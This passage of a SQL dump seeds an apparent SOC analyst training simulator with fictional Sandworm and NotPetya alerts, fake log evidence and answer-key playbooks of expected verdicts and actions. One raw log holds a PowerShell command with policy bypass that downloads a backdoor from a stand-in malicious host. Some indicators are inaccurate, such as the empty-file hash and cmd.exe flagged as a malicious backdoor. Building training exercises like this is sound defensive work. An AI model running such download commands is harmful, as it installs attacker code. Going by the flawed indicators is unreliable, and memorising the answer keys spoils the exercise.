1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(984, 'Destructive Actions on Critical Infrastructure', 'critical', 'SCADA System Monitoring', 'A critical alert has been triggered due to the detection of destructive actions targeting ICS/SCADA systems within the pharmaceutical sector. Indicators suggest the involvement of the Sandworm group, known for its expertise in causing physical infrastructure disruptions.', 'ICS/SCADA Targeting', 'T0831', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T14:56:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.15\",\"username\":\"scada_admin\",\"detected_malware\":\"NotPetya\",\"malware_hash\":\"71b6a493388e7d0b3c1f0a3b10a9a9cd\",\"affected_system\":\"ICS_Controller_01\",\"action_taken\":\"Wiper malware executed\",\"file_path\":\"/var/log/scada/ICS_Controller_01.log\",\"event_description\":\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with Sandworm group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"ICS/SCADA system targeted by malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"scada_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"clean\",\"details\":\"Authorized user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"71b6a493388e7d0b3c1f0a3b10a9a9cd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(985, 'Legal Review: Cyber Insurance \'Act of War\' Clause', 'critical', 'Legal Documentation', 'The investigation into the cyber attack revealed the use of sophisticated tactics, including destructive attacks targeting ICS/SCADA systems, reminiscent of Sandworm\'s techniques. The legal battle challenges the insurance \'act of war\' clause, as the attack involved the deployment of wiper malware similar to NotPetya, implicating supply chain vulnerabilities.', 'Legal Analysis', 'T1485: Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T15:23:45Z\",\"event_id\":\"ALERT_007\",\"source_ip\":\"188.166.253.134\",\"destination_ip\":\"192.168.1.15\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"filename\":\"notpetya_payload.exe\",\"user\":\"jdoe\",\"action\":\"file_execution\",\"description\":\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\",\"impact\":\"Destructive impact on critical infrastructure\",\"threat_actor\":\"Sandworm\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"188.166.253.134\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm APT\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal ICS network device\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya wiper malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"notpetya_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with NotPetya\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(986, 'Initial Access via Phishing Email', 'high', 'Email Gateway Logs', 'Sandworm has initiated an attack by sending a spear-phishing email to a TNT Express employee. The objective is to compromise user credentials and gain a foothold in the network. The email contains a malicious attachment that, when opened, attempts to harvest credentials.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_email\":\"john.doe@tntexpress.com\",\"subject\":\"Urgent: Update Your Account Credentials\",\"attachment\":\"Invoice_Update.docm\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_headers\":{\"from\":\"admin@secure-accounting.com\",\"to\":\"john.doe@tntexpress.com\",\"subject\":\"Urgent: Update Your Account Credentials\"}}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate machine.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@tntexpress.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Corporate Directory\",\"verdict\":\"internal\",\"details\":\"Valid employee email address.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"admin@secure-accounting.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"suspicious\",\"details\":\"Domain associated with phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document used by Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.676Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(987, 'Execution of NotPetya Payload', 'high', 'Endpoint Detection Logs', 'Upon gaining initial access, the attackers executed the NotPetya payload on compromised systems, causing immediate disruption and data encryption.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:26Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"192.168.1.101\",\"username\":\"compromised_user\",\"process_name\":\"notpetya.exe\",\"process_hash\":\"71f9e4ab8c1c2a4b1a5f9f2e3b7a4c5d\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\notpetya.exe\",\"action\":\"Executed\",\"severity\":\"High\"}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with NotPetya distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"suspicious\",\"details\":\"User account accessed from external IP.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"71f9e4ab8c1c2a4b1a5f9f2e3b7a4c5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"notpetya.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with NotPetya malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(988, 'Establishing Persistence via Backdoor Installation', 'high', 'Network Traffic Analysis', 'During network traffic analysis, an unauthorized communication from an internal host to a known malicious IP was detected. This activity correlates with the installation of a backdoor by the Sandworm threat actor to maintain prolonged access.', 'Backdoor Installation', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T13:45:30Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"username\":\"j.doe\",\"process_name\":\"cmd.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -c Invoke-WebRequest -Uri http://malicious.example.com/backdoor.exe -OutFile C:\\\\Users\\\\j.doe\\\\backdoor.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"destination_port\":80,\"protocol\":\"HTTP\",\"malware_name\":\"Sandworm Backdoor\"}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Associated with Sandworm APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Identified as compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Sandworm backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File System\",\"verdict\":\"malicious\",\"details\":\"Detected as unauthorized backdoor file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(989, 'Lateral Movement Across Legacy Systems', 'high', 'Active Directory Logs', 'The attackers exploit weak integration protocols within TNT\'s legacy systems to move laterally, exacerbating the damage and causing widespread operational disruption. The compromised credentials were used to access a legacy system and execute a known malicious binary associated with the Sandworm group.', 'Lateral Movement', 'T1075', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.15\",\"username\":\"legacy_admin\",\"logon_type\":3,\"hash\":\"34f7a3113803f8ed3b8fd7ce5656ebec\",\"filename\":\"notpetya.exe\",\"event_description\":\"An account was successfully logged on.\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"logon_guid\":\"{9e9b9c3a-b8e0-4e0b-8a9d-8c9e3c3a9ceb}\"}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Sandworm activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal legacy system IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"legacy_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"High-privilege account used anomalously.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"34f7a3113803f8ed3b8fd7ce5656ebec\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"notpetya.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with NotPetya malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 